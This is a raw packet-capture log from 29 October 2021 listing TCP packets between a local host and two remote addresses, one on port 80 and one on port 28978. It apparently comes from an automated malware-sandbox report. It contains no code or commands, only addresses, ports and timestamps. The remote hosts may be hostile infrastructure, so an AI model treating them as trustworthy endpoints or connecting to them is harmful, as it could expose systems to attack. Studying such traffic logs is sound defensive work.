                                                                                                                          Oct 29, 2021 17:07:26.764951944 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:26.764962912 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:26.764993906 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:26.765031099 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:26.765045881 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:26.765069008 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:26.765083075 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:26.765108109 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:26.765121937 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:26.765151024 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:26.765162945 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:26.765192032 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:26.765229940 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:26.765247107 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:26.765269995 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:26.765280962 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:26.765310049 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:26.765324116 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:26.765351057 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:26.765352011 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:26.765396118 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:26.765434027 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:26.765434980 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:26.765472889 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:26.765475988 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:26.765512943 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:26.765531063 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:26.765552044 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:26.765590906 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:26.765597105 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:26.765630960 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:26.765641928 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:26.765669107 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:26.765683889 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:26.765707970 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:26.765733004 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:26.765746117 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:26.765753031 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:26.765785933 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:26.765825033 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:26.765836000 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:26.765860081 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:26.765861988 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:26.765901089 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:26.765912056 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:26.765938997 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:26.765942097 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:26.765976906 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:26.765976906 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:26.766016006 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:26.766016960 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:26.766052961 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:26.766092062 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:26.766102076 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:26.766130924 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:26.766140938 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:26.766166925 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:26.766174078 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:26.766207933 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:26.766246080 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:26.766258001 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:26.766283035 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:26.766309023 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:26.766324043 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:26.766347885 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:26.766362906 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:26.766369104 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:26.766402960 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:26.766413927 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:26.766443014 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:26.766454935 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:26.766482115 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:26.766499043 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:26.766520023 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:26.766537905 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:26.766541004 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:26.766561985 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:26.766562939 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:26.766585112 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:26.766588926 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:26.766607046 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:26.766609907 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:26.766628027 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:26.766637087 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:26.766652107 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:26.766657114 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:26.766674042 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:26.766684055 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:26.766695976 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:26.766710997 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:26.766717911 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:26.766738892 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:26.766756058 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:26.766762972 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:26.766781092 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:26.766802073 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:26.766803980 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:26.766823053 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:26.766834974 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:26.766844988 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:26.766855955 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:26.766868114 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:26.766891003 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:26.766911030 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:26.770504951 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:26.770534039 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:26.770558119 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:26.770579100 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:26.770581961 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:26.770603895 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:26.770605087 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:26.770636082 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:26.770653963 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:26.770665884 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:26.770675898 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:26.770703077 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:26.770714998 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:26.770730019 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:26.770739079 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:26.770751953 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:26.770761967 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:26.770783901 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:26.770785093 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:26.770802975 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:26.770818949 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:26.770884037 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:26.770908117 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:26.770927906 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:26.770930052 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:26.770951986 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:26.770952940 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:26.770970106 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:26.770975113 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:26.770989895 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:26.770997047 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:26.771008968 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:26.771018982 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:26.771034956 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:26.771037102 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:26.771058083 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:26.771073103 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:26.791681051 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:26.794084072 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:26.805704117 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:26.805754900 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:26.805795908 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:26.805799007 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:26.805844069 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:26.805849075 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:26.805875063 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:26.805888891 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:26.805891037 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:26.805931091 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:26.805938959 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:26.805969954 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:26.805975914 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:26.806010008 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:26.806051016 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:26.806056976 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:26.806091070 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:26.806207895 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:26.813678026 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:26.813721895 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:26.813760996 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:26.813765049 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:26.813788891 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:26.813800097 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:26.813802004 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:26.813838959 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:26.813877106 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:26.813884974 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:26.813915014 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:26.813921928 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:26.813955069 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:26.813961983 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:26.813992977 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:26.814032078 CEST8049845194.180.174.181192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:26.814038992 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:26.815431118 CEST4984580192.168.2.7194.180.174.181
                                                                                                                          Oct 29, 2021 17:07:32.138724089 CEST4984328978192.168.2.793.115.20.139
                                                                                                                          Oct 29, 2021 17:07:32.167756081 CEST289784984393.115.20.139192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:32.167782068 CEST289784984393.115.20.139192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:32.167798042 CEST289784984393.115.20.139192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:32.167887926 CEST4984328978192.168.2.793.115.20.139
                                                                                                                          Oct 29, 2021 17:07:32.365540981 CEST4984328978192.168.2.793.115.20.139
                                                                                                                          Oct 29, 2021 17:07:33.387013912 CEST4984328978192.168.2.793.115.20.139
                                                                                                                          Oct 29, 2021 17:07:33.410763025 CEST289784984393.115.20.139192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:33.410845041 CEST289784984393.115.20.139192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:33.410978079 CEST4984328978192.168.2.793.115.20.139
                                                                                                                          Oct 29, 2021 17:07:33.434708118 CEST289784984393.115.20.139192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:33.434844971 CEST289784984393.115.20.139192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:33.434966087 CEST289784984393.115.20.139192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:33.434988022 CEST4984328978192.168.2.793.115.20.139
                                                                                                                          Oct 29, 2021 17:07:33.435067892 CEST4984328978192.168.2.793.115.20.139
                                                                                                                          Oct 29, 2021 17:07:33.435345888 CEST289784984393.115.20.139192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:33.435408115 CEST4984328978192.168.2.793.115.20.139
                                                                                                                          Oct 29, 2021 17:07:33.458673000 CEST289784984393.115.20.139192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:33.458759069 CEST4984328978192.168.2.793.115.20.139
                                                                                                                          Oct 29, 2021 17:07:33.458775997 CEST289784984393.115.20.139192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:33.458878994 CEST4984328978192.168.2.793.115.20.139
                                                                                                                          Oct 29, 2021 17:07:33.459338903 CEST289784984393.115.20.139192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:33.459414005 CEST4984328978192.168.2.793.115.20.139
                                                                                                                          Oct 29, 2021 17:07:33.459554911 CEST4984328978192.168.2.793.115.20.139
                                                                                                                          Oct 29, 2021 17:07:33.459711075 CEST289784984393.115.20.139192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:33.459778070 CEST4984328978192.168.2.793.115.20.139
                                                                                                                          Oct 29, 2021 17:07:33.459918976 CEST289784984393.115.20.139192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:33.460011005 CEST4984328978192.168.2.793.115.20.139
                                                                                                                          Oct 29, 2021 17:07:33.460547924 CEST289784984393.115.20.139192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:33.460560083 CEST289784984393.115.20.139192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:33.460644007 CEST4984328978192.168.2.793.115.20.139
                                                                                                                          Oct 29, 2021 17:07:33.482827902 CEST289784984393.115.20.139192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:33.482842922 CEST289784984393.115.20.139192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:33.482882977 CEST4984328978192.168.2.793.115.20.139
                                                                                                                          Oct 29, 2021 17:07:33.483148098 CEST289784984393.115.20.139192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:33.484355927 CEST289784984393.115.20.139192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:33.484368086 CEST289784984393.115.20.139192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:33.484664917 CEST4984328978192.168.2.793.115.20.139
                                                                                                                          Oct 29, 2021 17:07:33.484759092 CEST4984328978192.168.2.793.115.20.139
                                                                                                                          Oct 29, 2021 17:07:33.484817982 CEST289784984393.115.20.139192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:33.485033989 CEST289784984393.115.20.139192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:33.485542059 CEST289784984393.115.20.139192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:33.485657930 CEST289784984393.115.20.139192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:33.486176968 CEST289784984393.115.20.139192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:33.486624956 CEST289784984393.115.20.139192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:33.486820936 CEST289784984393.115.20.139192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:33.508275986 CEST289784984393.115.20.139192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:33.508312941 CEST289784984393.115.20.139192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:33.508666992 CEST289784984393.115.20.139192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:33.508790016 CEST289784984393.115.20.139192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:33.509104967 CEST4984328978192.168.2.793.115.20.139
                                                                                                                          Oct 29, 2021 17:07:33.509203911 CEST4984328978192.168.2.793.115.20.139
                                                                                                                          Oct 29, 2021 17:07:33.509267092 CEST289784984393.115.20.139192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:33.510010958 CEST289784984393.115.20.139192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:33.510802031 CEST289784984393.115.20.139192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:33.510828018 CEST289784984393.115.20.139192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:33.511101007 CEST4984328978192.168.2.793.115.20.139
                                                                                                                          Oct 29, 2021 17:07:33.511183977 CEST4984328978192.168.2.793.115.20.139
                                                                                                                          Oct 29, 2021 17:07:33.532788992 CEST289784984393.115.20.139192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:33.532826900 CEST289784984393.115.20.139192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:33.533078909 CEST289784984393.115.20.139192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:33.533152103 CEST289784984393.115.20.139192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:33.533353090 CEST289784984393.115.20.139192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:33.533781052 CEST289784984393.115.20.139192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:33.534234047 CEST289784984393.115.20.139192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:33.534960032 CEST289784984393.115.20.139192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:33.535577059 CEST289784984393.115.20.139192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:33.535835028 CEST289784984393.115.20.139192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:33.535861969 CEST4984328978192.168.2.793.115.20.139
                                                                                                                          Oct 29, 2021 17:07:33.535965919 CEST4984328978192.168.2.793.115.20.139
                                                                                                                          Oct 29, 2021 17:07:33.536319017 CEST289784984393.115.20.139192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:33.536942005 CEST289784984393.115.20.139192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:33.537290096 CEST289784984393.115.20.139192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:33.537919998 CEST289784984393.115.20.139192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:33.538149118 CEST289784984393.115.20.139192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:33.538516998 CEST4984328978192.168.2.793.115.20.139
                                                                                                                          Oct 29, 2021 17:07:33.538604975 CEST4984328978192.168.2.793.115.20.139
                                                                                                                          Oct 29, 2021 17:07:33.559808016 CEST289784984393.115.20.139192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:33.559834957 CEST289784984393.115.20.139192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:33.560060978 CEST289784984393.115.20.139192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:33.560161114 CEST289784984393.115.20.139192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:33.560563087 CEST289784984393.115.20.139192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:33.560724974 CEST289784984393.115.20.139192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:33.561126947 CEST289784984393.115.20.139192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:33.561151981 CEST289784984393.115.20.139192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:33.561316967 CEST289784984393.115.20.139192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:33.561547995 CEST289784984393.115.20.139192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:33.561920881 CEST289784984393.115.20.139192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:33.562182903 CEST289784984393.115.20.139192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:33.562330008 CEST289784984393.115.20.139192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:33.562562943 CEST289784984393.115.20.139192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:33.562762976 CEST289784984393.115.20.139192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:33.562863111 CEST4984328978192.168.2.793.115.20.139
                                                                                                                          Oct 29, 2021 17:07:33.562953949 CEST4984328978192.168.2.793.115.20.139
                                                                                                                          Oct 29, 2021 17:07:33.563500881 CEST289784984393.115.20.139192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:33.563653946 CEST289784984393.115.20.139192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:33.563678980 CEST289784984393.115.20.139192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:33.564002991 CEST289784984393.115.20.139192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:33.564150095 CEST289784984393.115.20.139192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:33.564577103 CEST289784984393.115.20.139192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:33.564764023 CEST289784984393.115.20.139192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:33.564982891 CEST289784984393.115.20.139192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:33.565254927 CEST289784984393.115.20.139192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:33.565596104 CEST4984328978192.168.2.793.115.20.139
                                                                                                                          Oct 29, 2021 17:07:33.565677881 CEST4984328978192.168.2.793.115.20.139
                                                                                                                          Oct 29, 2021 17:07:33.586649895 CEST289784984393.115.20.139192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:33.586868048 CEST289784984393.115.20.139192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:33.586893082 CEST289784984393.115.20.139192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:33.587127924 CEST289784984393.115.20.139192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:33.587327003 CEST289784984393.115.20.139192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:33.587496996 CEST289784984393.115.20.139192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:33.587711096 CEST289784984393.115.20.139192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:33.587884903 CEST289784984393.115.20.139192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:33.588165998 CEST289784984393.115.20.139192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:33.588524103 CEST289784984393.115.20.139192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:33.588617086 CEST289784984393.115.20.139192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:33.588810921 CEST289784984393.115.20.139192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:33.589091063 CEST289784984393.115.20.139192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:33.589246988 CEST289784984393.115.20.139192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:33.589325905 CEST289784984393.115.20.139192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:33.589570999 CEST289784984393.115.20.139192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:33.589616060 CEST4984328978192.168.2.793.115.20.139
                                                                                                                          Oct 29, 2021 17:07:33.589705944 CEST4984328978192.168.2.793.115.20.139
                                                                                                                          Oct 29, 2021 17:07:33.589970112 CEST289784984393.115.20.139192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:33.590207100 CEST289784984393.115.20.139192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:33.590234995 CEST289784984393.115.20.139192.168.2.7
                                                                                                                          Oct 29, 2021 17:07:33.590549946 CEST289784984393.115.20.139192.168.2.7
